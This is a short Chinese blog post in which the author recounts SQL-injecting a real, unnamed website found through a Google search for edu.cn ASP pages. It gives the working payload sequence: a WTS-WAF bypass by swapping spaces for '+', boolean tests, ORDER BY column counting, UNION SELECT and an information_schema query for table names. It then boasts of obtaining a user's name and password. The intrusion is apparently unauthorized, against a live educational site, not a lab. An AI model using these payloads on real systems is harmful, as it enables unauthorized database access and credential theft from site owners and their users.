SQL注入某网站绕过WTS-WAF

谷歌搜索inurl:edu.cn asp .发现了某网站,在查询的数字后面加了个'就报错了,我心想他可能存在注入漏洞.

然后开始尝试

?id=35 and 1=1#被拦截了

image-20210721115654068

没想到将空格换成+就过了,设置的太不严密了

?id=35+and+1=1+#显示信息

image-20210721115032916

?id=35+and+1=2+#没信息,可见存在数字型注入

image-20210721115058093

?id=35+order+by+1#,显示信息

image-20210721115032916

?id=35+order+by+2#不显示信息,可见字段名有1个

image-20210721115058093

?id=-1+union+select+1#显示可用字段名为第一个

image-20210721115338561

显示出用户表名

?id=-1+union+select+table_name+from%20information_schema.tables%20where%20table_schema=database()+limit+6,1#

接下来不演示了,SQL注入的老套路

获取的某个用户名,竟然是进行攻击的,哈哈哈

image-20210721130151571

某个用户的密码

image-20210721130044898

posted @ 2021-07-21 13:11  1ink  阅读(549)  评论(0编辑  收藏  举报